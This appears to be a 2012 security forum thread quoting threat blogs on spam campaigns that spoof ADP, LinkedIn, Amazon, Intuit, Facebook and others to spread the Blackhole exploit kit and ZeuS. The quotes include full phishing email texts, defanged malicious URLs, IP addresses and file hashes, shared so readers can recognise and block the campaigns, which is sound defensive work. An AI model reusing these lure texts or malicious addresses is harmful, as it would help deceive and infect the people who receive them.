- http://www.gfi.com/blog/rampaging-sq...-twitter-spam/
Oct 10, 2012 - "Yesterday I saw a news article that did a frankly amazing job of rendering the plight of a boyband member being attacked by a squirrel*, and mentioned it on Twitter. Within seconds, I was on the receiving end of some spam telling me I’d won a prize:
> http://www.gfi.com/blog/wp-content/u...0/1dirspam.jpg
Twitter users were spammed in groups, with the above account holding off on providing a URL to click. Instead, curious Tweeters would instead choose to visit the above account then click the URL in the profile – onedgiveaway(dot)com.
> http://www.gfi.com/blog/wp-content/u...0/2dirspam.jpg
“Congratulations 1D Fan! Please vote for your favourite 1D member below. To say thanks accept a free gift worth over $500
... I went for Liam Payne on the basis that he might be related to Max and ended up with the following survey page located at 1dviptickets(dot)com:
> http://www.gfi.com/blog/wp-content/u...0/3dirspam.jpg
... I came away with no free gift but lots of surveys (and a whole bunch of “Are you sure you want to go” style pop-ups while trying to leave the page) – nobody has “won” anything, it’s just some random fire-and-forget spam. At time of writing, the spam account is still active and blindfiring more messages to random Twitter users..."
* http://www.wandsworthguardian.co.uk/...Park_squirrel/
___
Fake job offers - union-trans .com employment scam
- http://blog.dynamoo.com/2012/10/unio...ment-scam.html
10 Oct 2012 - "This fake job offer is for a "forwarding agent"... basically it's a parcel reshipping scam where goods bought with stolen credit cards are sent to the "agent's" home address, and then the "agent" forwards to stolen goods on to Eastern Europe or China or whatever. Of course, when the police catch on it's the "agent" who is in deep, deep trouble... There appear to be several scam domains in this same email. union-trans .com is hosted on 180.178.32.238 (Simcentric, Hong Kong)... Originating IP is 183.134.113.165 (Zhejiang Telecom, Ningbo, China)... Generally speaking, unsolicited job offers from out-of-the-way places are bad news and should be avoided."
Sprint SPAM / 1.starkresidential .net
- http://blog.dynamoo.com/2012/10/spri...entialnet.html
9 Oct 2012 - "This fake Sprint spam leads to malware on 1.starkresidential .net...
The malicious payload is at [donotclick]1.starkresidential .net/links/assure_numb_engineers.php hosted on 74.207.233.58 (Linode, US)... appear to be malicious subdomains of legitimate hacked domains. If you can, you should block traffic to 74.207.233.58 to stop other malicious sites on the same server from being a problem."
"Biweekly payroll" SPAM / editdvsyourself .net
- http://blog.dynamoo.com/2012/10/biwe...urselfnet.html
9 Oct 2012 - "This fake payroll spam leads to malware on editdvsyourself .net...
The malicious payload is on [donotclick]editdvsyourself .net/detects/beeweek_status-check.php, hosted on the familiar IP address of 183.81.133.121 (Vodafone, Fiji)..."
___
Facebook Scam SPAM
- https://isc.sans.edu/diary.html?storyid=14281
Last Updated: 2012-10-10 14:32:26 UTC - "... reports of Facebook Scam Spam... TinyURL has since taken down the redirect and classified it as Spam. However, the image (and others like it) still propagate by FB users clicking on the link. This type of scam is used mostly -without- the permission of the vendor noted, in this case Costco*. The idea is to entice the user to click so they get -redirected- to a site where the business model depends on traffic volume...
> https://isc.sans.edu/diaryimages/Dia...-Scam-Spam.png
If you are a Facebook user, then please be wary of any offers that entice you to "click" to receive. It's a really bad practice. The holiday shopping season is beginning and these vectors are going to be heavily used by the scammers in the coming months."
:fear: :fear: :mad:
-
Malicious Presidential SPAM campaign has started...
FYI...
Malicious Presidential SPAM campaign has started...
- http://community.websense.com/blogs/...n-started.aspx
10 Oct 2012 - "... Websense... has detected a spam campaign that tries to exploit recipients' interest in the current presidential campaign in the US. Specifically, we have detected thousands of emails with this kind of content:
> http://community.websense.com/cfs-fi...2D00_550x0.png
... we are seeing an increasing number of spam campaigns with malicious links that lead to BlackHole exploit pages. This is also what happens with this campaign. If the recipient clicks on one of the links in the email, it starts a redirection flow which leads to URLs that host BlackHole exploit code. We simulated the recipient's experience with the support of the Fiddler tool, as shown below:
> http://community.websense.com/cfs-fi...0.sshot002.png
The pattern used strongly resembles the pattern used in other malicious, BlackHole-based spam campaigns, so we decided to investigate using a little set of samples from this campaign. The samples were chosen based on thousands of emails.
> http://community.websense.com/cfs-fi...6.sshot004.PNG
The links found in the spam emails usually has this kind of content:
> http://community.websense.com/cfs-fi...8.sshot005.PNG
The purpose of this flow as usual is to install malicious files. In this malicious SPAM campaign, we noticed low detected PDF, JAR and EXE files (used to compromise the victim systems). During our simulated user exeperience we have found the following involved files:
PDF - MD5: 69e51d3794250e3f1478404a72c7a309
JAR file - MD5: 03373056bb050c65c41196d3f2d68077
about.exe - MD5: 9223b428b28c7b8033edbb588968eaea ...
Each URL... contains a redirection payload that leads the victim to a malicious website that hosts BlackHole exploit kit 2.0 obfuscated code..."
- http://blog.trendmicro.com/trendlabs...nline-threats/
Update as of Oct 11, 2012 - "... email is supposedly from CNN and contains news stories about the election:
> http://blog.trendmicro.com/trendlabs...0/cnn-spam.png
... instead of news articles, the links lead users to a variant of the ZeuS banking Trojan, delivered by the Blackhole exploit kit..."
- http://blog.trendmicro.com/trendlabs...nline-threats/
Oct 10, 2012 - "... This reinforces the fact that the bad guys have all the bases covered when it comes to exploiting popular events. Whoever wins come November 6th, end users will end up losing in one way or another if they’re not careful. So keep yourself informed. Get your news only from trusted sources, and make sure to have an Internet security solution installed on your devices."
:mad:
-
LinkedIn SPAM and more SPAM...
FYI... Multiple entries:
LinkedIn SPAM / inklingads .biz
- http://blog.dynamoo.com/2012/10/link...ingadsbiz.html
11 Oct 2012 - "The bad guys are very busy today with all sorts of spam campaigns, including lots of messages as below pointing to malware on
From: LinkedIn Notification [mailto:hewedngq6@omahahen.org]
Sent: 11 October 2012 15:59
Subject: LinkedIn Reminder
Importance: High
LinkedIn
REMINDERS
Invite events:
From Thaddeus Sosa ( Your servant)
PENDING EVENTS
There are a total of 3 messages awaiting your action. See your InBox immediately...
The malicious payload is on [donotclick]inklingads.biz/detects/invite-request_checking.php hosted on 183.81.133.121 (Vodafone, Fiji)"
___
ADP SPAM / 198.143.159.108
- http://blog.dynamoo.com/2012/10/adp-...143159108.html
12 Oct 2012 - "Yet -more- fake ADP spam (there has been a lot over the past 24 hours) is being pushed out. This time there's a malicious payload at [donotclick]198.143.159.108 /links/rules_familiar-occurred.php (Singlehop, US).
Avoid."
___
ADP SPAM / 4.wapin .in and 173.224.209.165:
- http://blog.dynamoo.com/2012/10/adp-spam-4wapinin.html
11 Oct 2012 - "This fake ADP spam leads to malware on 4.wapin .in:
From: ADP.Security [mailto:5BC4F06B@act4kids.net]
Sent: 11 October 2012 14:22
Subject: ADP: Urgent Notification
This e-mail has been sent from an automated system. PLEASE DO NOT REPLY.
If you have any questions, please contact your administrator for assistance.
----
Digital Certificate About to Expire...
The malicious payload is on [donotclick]4.wapin .in/links/assure_numb_engineers.php hosted on 198.136.53.39 (Comforthost, US).
Another variant of this goes to [donotclick]173.224.209.165/links/assure_numb_engineers.php (Psychz Networks, US)"
___
ADP SPAM / 108.61.57.66
- http://blog.dynamoo.com/2012/10/adp-spam-108615766.html
11 Oct 2012 - "There's masses of ADP-themed spam today. Here is another one:
Date: Thu, 11 Oct 2012 14:53:17 -0200
From: "ADP.Message" [986E3877@dixys.com]
Subject: ADP Generated Message
This e-mail has been sent from an automated system. PLEASE DO NOT REPLY.
If you have any questions, please contact your administrator for assistance.
---------------------------------------------------------------------
Digital Certificate About to Expire
---------------------------------------------------------------------
The digital certificate you use to access ADP's Internet services is about to expire. If you do not renew your certificate by the expiration date below, you will not be able to access ADP's Internet services.
Days left before expiration: 3
Expiration date: Oct 14 23:59:59 GMT-03:59 2012
---------------------------------------------------------------------
Renewing Your Digital Certificate ...
In this case the malicious payload is at [donotclick]108.61.57.66 /links/assure_numb_ engineers .php hosted by Choopa LLC in the US. The IP is probably worth blocking to be on the safe side."
___
Blackhole sites to block ...
- http://blog.dynamoo.com/2012/10/blac...ck-111012.html
11 Oct 2012 - "A bunch of sites are active today with the Blackhole exploit kit.. here are the ones seen so far:
183.81.133.121
198.136.53.39
173.255.223.77
64.247.188.141
inklingads .biz
The delivery mechanisms are fake LinkedIn and eFax messages. Block those IPs if you can.
___
"Copies of Policies" SPAM / windowsmobilever .ru
- http://blog.dynamoo.com/2012/10/copi...cies-spam.html
11 Oct 2012 - "This slightly odd spam leads to malware on windowsmobilever .ru:
Date: Thu, 11 Oct 2012 10:55:37 -0500
From: "Amazon.com" [account-update@amazon.com]
Subject: RE: DONNIE - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
DONNIE LOCKWOOD,
==========
Date: Thu, 11 Oct 2012 12:26:25 -0300
From: accounting@[redacted]
Subject: RE: MARGURITE - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
MARGURITE Moss
Anyone who clicks on the link will end up on an exploit kit at [donotclick]windowsmobilever .ru:8080/forum/links/column.php - hosted on:
68.67.42.41 (Fibrenoire , Canada)
203.80.16.81 (MYREN, Malaysia)
These two IPs are currently involved in several malicious spam runs and should be blocked if you can."
___
eFax SPAM / 173.255.223.77 and chase .swf
- http://blog.dynamoo.com/2012/10/efax...-chaseswf.html
11 Oct 2012 - "Two different eFax spam runs seem to be going on at the same time:
' From: eFax Corporate [mailto:05EBD8C@poshportraits.com]
Sent: 11 October 2012 12:58
Subject: eFax notification
You have received a 50 page(-s) fax...'
' From: eFax.Corporate [mailto:2C4C2348@aieservices.com.au]
Sent: 11 October 2012 12:51
Subject: eFax: You have received new fax
You have received a 34 page(-s) fax...'
One leads to a malicious landing page at [donotclick]173.255.223.77 /links/assure_numb_engineers.php hosted by Linode in the US.
The other one is a bit odder, referring to a file called chase.swf on a hacked site. VT analysis shows just 1/44* which is -not- good..."
* https://www.virustotal.com/file/5db6...7784/analysis/
File name: chase.swf-QrUTmm
Detection ratio: 1/40
Analysis date: 2012-10-11 13:04:39 UTC...
:mad::mad:
-
Vodafone SPAM - emails serve malware
FYI...
Vodafone SPAM - emails serve malware
- http://blog.webroot.com/2012/10/15/v...serve-malware/
Oct 15, 2012 - "Cybercriminals are currently spamvertising millions of emails, impersonating Vodafone Europe, in an attempt to trick their customers into executing the malicious file attachment found in the email...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....il_malware.png
Detection rate: Vodafone_Account_Balance.pdf.exe – MD5: 8601ece8b0c79ec3d4396f07319bbff1 * ... Trojan-Ransom.Win32.PornoAsset.xen; Worm:Win32/Gamarue.F..."
* https://www.virustotal.com/file/2d62...is/1349008562/
File name: Your_Friend_New_photos-updates.jpeg.exe
Detection ratio: 36/43
Analysis date: 2012-09-30 15:01:54 UTC
___
Fake UPS emails - client-side exploits and malware
- http://blog.webroot.com/2012/10/15/c...s-and-malware/
Oct 15, 2012 - "... cybercriminals spamvertised millions of email addresses, impersonating UPS, in an attempt to trick end users into viewing the malicious .html attachment. Upon viewing, the file loads a tiny iFrame attempting to serve client-side exploit served by the latest version of the BlackHole Exploit kit, which ultimately drops malware on the affected host.
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....xploit_kit.png
... Sample detection rate for a malicious .html file found in the spamvertised emails: UPS_N21489880.htm – MD5: 38a2a54d6e7391d7cd00b50ed76b9cfb * ... Trojan.Iframe.BCK; Trojan-Downloader.JS.Iframe.dbh
* https://www.virustotal.com/file/37d8...a453/analysis/
File name: java.jar
Detection ratio: 26/43
Analysis date: 2012-10-15
... currently responding to the following IPs – 84.22.100.108; 190.10.14.196; 203.80.16.81; 61.17.76.12; 213.135.42.98
... Related malicious domains part of the campaign’s infrastructure:
rumyniaonline .ru – 84.22.100.108
denegnashete .ru – 84.22.100.108
dimabilanch .ru – 84.22.100.108
ioponeslal .ru – 84.22.100.108
moskowpulkavo .ru – 84.22.100.108
omahabeachs .ru – 84.22.100.108
uzoshkins .ru – 84.22.100.108
sectantes-x .ru – 84.22.100.108
... Name servers part of the campaign’s infrastructure:
ns1.denegnashete .ru – 62.76.190.50
ns2.denegnashete .ru – 87.120.41.155
ns3.denegnashete .ru – 132.248.49.112
ns4.denegnashete .ru – 91.194.122.8
ns5.denegnashete .ru – 62.76.188.246
ns6.denegnashete .ru – 178.63.51.54 ..."
___
Rogue Bad Piggies ...
- http://blog.trendmicro.com/trendlabs...gies-versions/
Oct 15, 2012 - "... Right after reports of malicious Bad Piggies on Google Chrome webstore circulated, we found that certain developers also released their own, albeit rogue versions of the said gaming app. On the heels of Bad Piggies‘ launch last month, we saw rogue versions of the game on specific web pages hosted on Russian domains. However, these versions are -not- affiliated at all with the game. Based on our analysis, these apps are verified as malicious, specifically premium service abusers, which send SMS messages without user consent and leaves users with unnecessary charges... During our research, we used the keyword “Bad Piggies” and encountered 48 Russian domains. Among these sites is piggies-{BLOCKED}d .ru, which appears as an app download page.
> http://blog.trendmicro.com/trendlabs...es_website.jpg
... site offers the said app on different platforms. Instead of the actual Bad Piggies app, users instead download a malicious .APK file detected as ANDROIDOS_FAKEINST.A. Once installed, it creates a shortcut on the device’s homepage and sends SMS messages to specific numbers. As mentioned, these messages are sent without user consent and may cost users to pay extra for something they didn’t authorize... ANDROIDOS_FAKEINST.A has the ability to obfuscate its codes via inserting junk codes and encrypting the strings and decrypting it upon execution. It also replaces all class/method/field name with meaningless strings thus making analysis difficult... Bad Piggies is a spinoff of the highly popular Angry Bird franchise and its release enjoyed good coverage from popular media. Such is also the case with the malicious Instagram and Angry Birds Space... To victimize as many users as possible, shady developers and certain crooks created rogue versions to take advantage of these apps’ popularity and their media exposure. Russian domains also appear to be the favorite among rogue apps developers. Beginning this year up to July, we already blocked more than 6,000 mobile app pages hosted on .RU domains... an increase compared to last year’s 2,946 blocked sites. To lead users to these sites, the people behind these apps spread the links via forum, blog posts or email. To prevent downloading a fake (or worse, a malware disguised as an app) users should stick to legitimate app stores like Google Play..."
___
eBay phishers update branding...
- http://www.gfi.com/blog/ebay-phisher...heir-branding/
Oct 15, 2012 - "... be aware that not only have eBay updated their logo for the first time since 1995, some scammers have also been quick out of the blocks to rejig their phishing scams and paste in the new logo accordingly. Here’s a scammer who hasn’t quite grasped the concept of “You’re horribly outdated” yet:
> http://www.gfi.com/blog/wp-content/u...kebay_new2.jpg
... here’s a scammer who clearly keeps up with the news and probably owns a gold plated yacht and maybe a Unicorn as a result:
> http://www.gfi.com/blog/wp-content/u...kebay_new1.jpg
... It probably won’t be long before most (if not all) phishers start using the new logo, but for the time being at least some phish attempts will be a little easier to spot for the average end-user. Of course, avid eBay users can also visit their Security Center* and keep up to date with all the latest shenanigans."
* http://pages.ebay.com/securitycenter/index.html ..."
:fear::fear: :mad:
-
SPAM, SPAM, and more SPAM ...
FYI...
Wire Transfer SPAM / hotsecrete .net
- http://blog.dynamoo.com/2012/10/wire...ecretenet.html
16 Oct 2012 - "This fake wire transfer spam leads to malware on hotsecrete .net:
From: Federal Information System [mailto:highjackingucaf10@atainvest.com]
Sent: 16 October 2012 15:59
Subject: Wire Transfer accepted
We have successfully done the following transfer:
________________________________________
Item #: 35043728
Amount: $16,861.99
To: Anthony Glover
Fee: 29.00
Send on Date: 10/16/2012
Service: Domestic Wire
________________________________________
If there is a problem with processing your request we would report to you both by email and on the Manage Accounts tab. You can always check your transfer status via this link Sincerely,
Federal Reserve Bank Automate Notify System
*********************************************
Email Preferences
This is a service warning from Federal Reserve Bank. Please note that you may receive notification note in accordance with your service agreements, whether or not you elect to receive promotional email.
=============================================
Federal Reserve Bank Email, 8th Floor, 170 Seashore Tryon, Ave., Charlotte, TX 89936-0001 Federal Reserve Bank.
The malicious payload is found at [donotclick]hotsecrete .net/detects/exclude-offices_details_warm.php hosted on 183.81.133.121 (Vodafone, Fiji) which is a well-known malicious IP address that you should block."
___
LinkedIn SPAM / 74.91.112.86
- http://blog.dynamoo.com/2012/10/link...749111286.html
16 Oct 2012 - "This fake LinkedIn spam leads to malware on 74.91.112.86:
From: LinkedIn.Invitations [mailto:1F31A2F6B@delraybeachhomesales.com]
Sent: 16 October 2012 13:50
To: [redacted]
Subject: New invitation is waiting for your response
Hi [redacted],
David sent you an invitation to connect 13 days ago. How would you like to respond?
Accept Ignore Privately
Hilton Suarez
Precision Castparts (Distributor Sales Manager EMEA)
You are receiving Invitation emails. Unsubscribe.
This email was intended for [redacted].
Learn why we included this.
2012, LinkedIn Corporation. 2029 Stierlin Ct. Mountain View, CA 94043, USA
The malicious payload is on [donotclick]74.91.112.86 /links/assure_numb_engineers.php hosted by Nuclearfallout Enterprises in the US (no surprises there)."
___
Facebook SPAM / o.anygutterkings .com
- http://blog.dynamoo.com/2012/10/face...rkingscom.html
15 Oct 2012 - "This fake Facebook spam leads to malware on o.anygutterkings .com:
Date: Mon, 15 Oct 2012 20:02:21 +0200
From: "FB Account"
Subject: Facebook account
facebook
Hi [redacted],
You have blocked your Facebook account. You can reactivate your account whenever you wish by logging into Facebook with your former login email address and password. Subsequently you will be able to take advantage of the site as before
Kind regards,
The Facebook Team
Sign in to Facebook and start connecting ...
Please use the link below to resume your account ...
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future, please click: unsubscribe.
Facebook, Inc. Attention: Department 415 P.O Box 10005 Palo Alto CA 94303
Other subjects are: "Account blocked" and "Account activated"
The payload is at [donotclick]o.anygutterkings .com/links/assure_numb_engineers.php hosted on 198.136.53.38 (Comforthost, US)..."
- http://www.gfi.com/blog/this-spam-gi...second-chance/
Oct 16, 2012 - "... another Blackhole-Zeus-related threat... ignore and delete this Facebook spam..."
> http://www.gfi.com/blog/wp-content/u...10/FB_1015.png
___
Intuit SPAM / navisiteseparation .net
- http://blog.dynamoo.com/2012/10/intu...rationnet.html
15 Oct 2012 - "This fake Intuit spam leads to malware on navisiteseparation .net:
Date: Mon, 15 Oct 2012 15:20:13 -0300
From: "Intuit GoPayment" [crouppywo4@deltamar.net]
Subject: Welcome - you're accepted for Intuit GoPayment
Congratulations!
GoPayment Merchant by Intuit request for ONTIMEE ADMINISTRATION, Inc. has been ratified.
GoPayment
Account Number: XXXXXXXXXXXXXX55
Email Address: [redacted]
PLEASE NOTE : Associated charges for this service may be applied now.
Next step: View or confirm your Access ID
This is {LET:User ID lets you:
Review your payment service in the Merchant Center
Review charges
Log In to other Intuit products you may use, like TurboTax, Quicken, and Intuit Payroll
The good news is we found an existing Intuit account for your email address, You can use this ID for your payment service also, or enter a new one.
Verify Access ID
Get started:
Step 1: If you have not still, download the Intuit software.
Step 2: Launch the Intuit application and sign in with the Access ID (your email address) and Password you setup.
Easy Manage Your Intuit GoPayment Account
The GoPayment Merchant Service by Intuit Center is the web site where you can learn more about GoPayment features, customize your sales receipt and add GoPayment users. You can also view transactions, deposits and fees. Visit url and sign in with your GoPayment AccesID (your email address) and Password.
For more information on how to start using GoPayment Merchant by Intuit, including tutorials, FAQs and other resources, visit the Merchant Service Center at service link.
Please don't reply to this message. auto informer system unable to accept incoming messages.
System Terms & Agreements � 2008-2012 Intuit, INC. All rights reserved.
... Sample subjects:
Congrats - you're accepted for Intuit GoPayment Merchant
Congratulations - you're approved for Intuit Merchant
Congrats - you're approved for GoPayment Merchant
Welcome - you're accepted for Intuit GoPayment
The malicious payload is at [donotclick]navisiteseparation .net/detects/processing-details_requested.php hosted on 183.81.133.121 (Vodafone, Fiji). The good news is that the domain has been suspended by the registrar, but that IP address has been used many times recently and should be blocked if you can."
___
Copies of Policies SPAM / linkrdin .ru
- http://blog.dynamoo.com/2012/10/copi...inkrdinru.html
15 Oct 2012 - "Another "Copies of Policies" spam, this time leading to malware on linkrdin .ru:
From: [support@victimdomain.com]
Date: 15 October 2012 07:15
Subject: RE: SANTOS - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
The malicious payload is on [donotclick]linkrdin .ru:8080/forum/links/column.php ... hosted on the same IPs as this spam:
68.67.42.41 (Fibrenoire, Canada)
79.98.27.9 (UAB Interneto Vizija, Lithunia)
203.80.16.81 (MYREN, Malaysia) ..."
:mad::mad: :fear:
-
Fake AA, Amazon emails serve BlackHole Exploit kit
FYI...
Fake American Airlines emails serve BlackHole Exploit kit ...
- http://blog.webroot.com/2012/10/17/a...e-exploit-kit/
Oct 17, 2012 - "... cybercriminals launched yet another massive spam campaign, this time impersonating American Airlines in an attempt to trick its customers into clicking on a malicious link found in the mail. Upon clicking on the link, users are exposed to the client-side exploits served by the BlackHole Exploit Kit v2.0...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....xploit_kit.png
Spamvertised compromised URL: hxxp ://malorita-hotel .by/wp-config.htm
Detection rate for a sample Java script redirection: American_Airlines.html – MD5: 7b23a4c26b031bef76acff28163a39c5* ...JS/Exploit-Blacole.gc; JS:Blacole-CF [Expl]
Sample client-side exploits serving URL: hxxp ://omahabeachs .ru:8080/forum/links/column.php
We’ve already seen the same malicious email used in the previously profiled “Cybercriminals impersonate -UPS-, serve client-side exploits and malware” campaign, clearly indicating that these campaigns are launched by the same cybercriminal/gang of cybercriminals..."
* https://www.virustotal.com/file/68d4...is/1349016199/
File name: American_Airlines.html
Detection ratio: 9/42
Analysis date: 2012-09-30
___
Fake Amazon emails serve BlackHole Exploit kit ...
- http://blog.webroot.com/2012/10/16/c...s-and-malware/
Oct 16, 2012 - "... cybercriminals have been spamvertising millions of emails impersonating Amazon.com in an attempt to trick customers into thinking that they’ve received a Shipping Confirmation for a Vizio XVT3D04, HD 40-Inch 720p 100 Hz Cinema 3D LED-LCD HDTV FullHD and Four Pairs of 3D Glasses. Once users click on any of the links found in the malicious email, they’re automatically exposed to the client-side exploits served by the latest version of the Black Hole Exploit kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....xploit_kit.png
... Second screenshot of the spamvertised email impersonating Amazon.com Inc:
> https://webrootblog.files.wordpress....oit_kit_01.png
Once users click on the links found in the malicious email, they’re presented with the following bogus “Page loading…” page:
> https://webrootblog.files.wordpress....oit_kit_02.png
Sample subjects used in the spamvertised emails:
Re: HD TV Waiting on delivery Few hours ago;
Your HDTV Delivered Now;
Re: HDTV Processed Yesterday;
Re: Order Processed Today;
Your Order Approved Few hours ago ...
Sample detection rate for the malicious Java script: – Amazon.html – MD5: a8af3b2fba56a23461f2cc97a7b97830* ... JS/Obfuscus.AACB!tr; Trojan-Downloader.JS.Expack.ael
Once a successful client-side exploitation takes place, the BlackHole Exploit kit drops a malicious PDF file with MD5: 9a22573eb991a3780791a2df9c55ddab* that’s exploiting the CVE-2010-0188 vulnerability."
* https://www.virustotal.com/file/4747...is/1349014600/
File name: Amazon.html
Detection ratio: 20/43
Analysis date: 2012-09-30
___
Spoofed WebEx, PayPal Emails lead to Rogue Flash Update
- http://blog.trendmicro.com/trendlabs...-flash-update/
Oct 16, 2012 - "... Last week, we received two spoofed emails that redirect users to a fake Adobe Flash Player update. These messages use different approaches to lure users into downloading the malicious file update_flash_player.exe (detected as TSPY_FAREIT.SMC).
The first email is disguised as a WebEx email containing an HTM attachment. Once users execute this attachment, they are led to a malicious site hosting TSPY_FAREIT.SMC. Employees may be trick into opening this as it appears to be an alert coming from a business tool they often use...
> http://blog.trendmicro.com/trendlabs...ebex_email.jpg
The second sample, on the other hand, is a spoofed PayPal email that features transaction details.
> http://blog.trendmicro.com/trendlabs...shingemail.jpg
Curious users who click these details are then directed to the webpage hosting the rogue Flash update file... Once executed, TSPY_FAREIT.SMC drops a variant of the infamous banking malware ZeuS/ZBOT, specifically TSPY_ZBOT.AMM and TSPY_ZBOT.LAG. If you may recall, this malware family is known for its information theft routines. These variants are specifically crafted to steal online banking credentials such as usernames, passwords, and other important account details. These stolen information are then used to initiate transactions without users knowledge or are peddled in the underground market for the right price... The use of WebEx in these spoofed emails is also fishy (phishy?). WebEx is a popular business conference/meeting technology in the corporate world... We believe that the perpetrators of this threat are likely targeting businesses and employees...
Update... We observed a blackhole exploit kit (BHEK) spam run mimicking Facebook notification that leads to the site hosting another rogue Flash Player update (detected as TSPY_FAREIT.AMM) that drops ZeuS/ZBOT variants... expect that such spam runs won’t be fading soon... these attacks are continuing at full speed... users are advised to be continuously extra careful with clicking links on email messages."
:mad::mad:
-
Fake Traffic Ticket SPAM - and more...
FYI...
NY Traffic Ticket SPAM / kennedyana .ru
- http://blog.dynamoo.com/2012/10/ny-t...nedyanaru.html
18 Oct 2012 - "This fake Traffic Ticket spam leads to malware on kennedyana .ru:
Date: Wed, 17 Oct 2012 03:59:44 +0600
From: sales1@[redacted]
To: [redacted]
Subject: Fwd: NY TRAFFIC TICKET
New-York Department of Motor Vehicles
TRAFFIC TICKET
NEW-YORK POLICE DEPARTMENT
THE PERSON CHARGED AS FOLLOWS
Time: 5:16 AM
Date of Offense: 21/01/2012
SPEED OVER 50 ZONE
TO PLEAD CLICK HERE AND FILL OUT THE FORM
The malicious payload is on [donotclick]kennedyana .ru:8080/forum/links/column.php hosted on the following IPs:
68.67.42.41 (Fibrenoire, Canada)
72.18.203.140 (Las Vegas NV Datacenter, US)
203.80.16.81 (MYREN, Malaysia) ..."
___
Fake Intuit 'Payroll Confirmation inquiry’ emails lead to the BlackHole exploit kit
- http://blog.webroot.com/2012/10/18/i...e-exploit-kit/
Oct 18, 2012 - "...two consecutive massive email campaigns, impersonating Intuit Payroll’s Direct Deposit Service system, in an attempt to trick end and corporate users into clicking on the malicious links found in the mails. Upon clicking on -any- of links found in the emails, users are exposed to the client-side exploits served by the latest version of the BlackHole exploit kit...
Sample screenshot of the first spamvertised campaign:
> https://webrootblog.files.wordpress....xploit_kit.png
Upon clicking on the links found in the malicious emails, users are exposed to the following bogus “Page loading…” screen:
> https://webrootblog.files.wordpress....oit_kit_01.png
Screenshots of the second spamvertised campaign:
> https://webrootblog.files.wordpress....oit_kit_02.png
... Both of these malicious domains use to respond to 183.81.133.121; 195.198.124.60; 203.91.113.6. More malicious domains part of the campaign’s infrastructure are known to have responded to the same IPs... Detection rate, MD5: 5723f92abf257101be20100e5de1cf6f * ... Gen:Variant.Kazy.96378; Worm.Win32.Cridex.js, MD5: 06c6544f554ea892e86b6c2cb6a1700c ** ... Trojan.Win32.Buzus.mecu; Worm:Win32/Cridex.B..."
* https://www.virustotal.com/file/64e1...4bb3/analysis/
File name: contacts.exe
Detection ratio: 17/43
Analysis date: 2012-09-29
** https://www.virustotal.com/file/ee30...d907/analysis/
File name: virussign.com_06c6544f554ea892e86b6c2cb6a1700c.exe
Detection ratio: 33/43
Analysis date: 2012-10-19
___
Adbobe CS4 SPAM / leprasmotra .ru
- http://blog.dynamoo.com/2012/10/adbo...asmotraru.html
18 Oct 2012 - "This fake Adobe spam leads to malware on leprasmotra.ru:
Date: Thu, 18 Oct 2012 10:00:26 -0300
From: "service@paypal.com" [service@paypal.com]
Subject: Order N04833
Good morning,
You can download your Adobe CS4 License here -
We encourage you to explore its new and enhanced capabilities with these helpful tips, tutorials, and eSeminars.
Thank you for buying Adobe InDesign CS4 software.
Adobe Systems Incorporated
The malicious payload is at [donotclick]leprasmotra .ru:8080/forum/links/column.php hosted on:
72.18.203.140 (Las Vegas NV Datacenter, US)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNET, US)
Blocking access to those IPs is recommended."
___
LinkedIn SPAM / 64.111.24.162
- http://blog.dynamoo.com/2012/10/link...411124162.html
17 Oct 2012 - "This fake LinkedIn spam leads to malware on 64.111.24.162:
From: LinkedIn.Invitations [mailto:8B44145D0@bhuna.net]
Sent: 17 October 2012 10:06
Subject: New invitation is waiting for your response
Hi [redacted],
User sent you an invitation to connect 6 days ago. How would you like to respond?
Accept Ignore Privately
Alexis Padilla
C.H. Robinson Worldwide (Sales Director)
You are receiving Invitation emails. Unsubscribe.
This email was intended for [redacted].
Learn why we included this.
2012, LinkedIn Corporation. 2029 Stierlin Ct. Mountain View, CA 94043, USA
The malicious payload is at [donotclick]64.111.24.162 /links/assure_numb_engineers.php allocated to Data 102 in the US and then suballocated to:
network:Network-Name:Buzy Bee Hosting /27
network:IP-Network:64.111.24.160/27
network:IP-Network-Block:64.111.24.160 - 64.111.24.191
network:Org-Name:Buzy Bee Hosting
network:Street-Address:1451 North Challenger Dr
network:City:Pueblo West
network:State:CO
network:Postal-Code:81007
network:Country-Code:US
... Blocking the IP (and possibly the /27 block) is probably wise.
___
Amazon.com SPAM / sdqhfckuri .ddns.info and ultjiyzqsh .ddns.info
- http://blog.dynamoo.com/2012/10/amaz...iddnsinfo.html
17 Oct 2012 - "This fake Amazon.com spam leads to malware on sdqhfckuri .ddns.info and ultjiyzqsh .ddns.info:
From: Amazon.Com [mailto:pothooknw@tcsn.net]
Sent: 17 October 2012 06:54
Subject: Your Amazon.com order of "Bulova Men's 94B316 Precisionist Claremont Brown Leather Watch" has shipped!
Importance: High
Gift Cards
| Your Orders
| Amazon.com
Shipping Confirmation
Order #272-3140048-4213404
Hello,
Thank you for shopping with us. We thought you'd like to know that we shipped your gift, and that this completes your order. Your order is on its way, and can no longer be changed. If you need to return an item from this shipment or manage other orders, please visit Your Orders on Amazon.com.
Your estimated delivery date is:
Tuesday, October 9, 2012
Your package is being shipped by UPS and the tracking number is 1ZX305712324670208. Depending on the ship speed you chose, it may take 24 hours for your tracking number to return any information.
Shipment Details
Bulova Men's 94B316 Precisionist Claremont Brown Leather Watch
Sold by Amazon.com LLC (Amazon.com) $109.95
Item Subtotal: $109.95
Shipping & Handling: $0.00
Total Before Tax: $109.95
Shipment Total: $109.95
Paid by Visa: $109.95
Returns are easy. Visit our Online Return Center.
If you need further assistance with your order, please visit Customer Service.
We hope to see you again soon!
Amazon.com
This email was sent from a notification-only address that cannot accept incoming email. Please do not reply to this message.
The malicious payload is at [donotclick]sdqhfckuri .ddns.info/links/calls_already_stopping.php or [donotclick]ultjiyzqsh .ddns.info/links/calls_already_stopping.php hosted on 37.230.117.4 (The First CJSC, Russia).
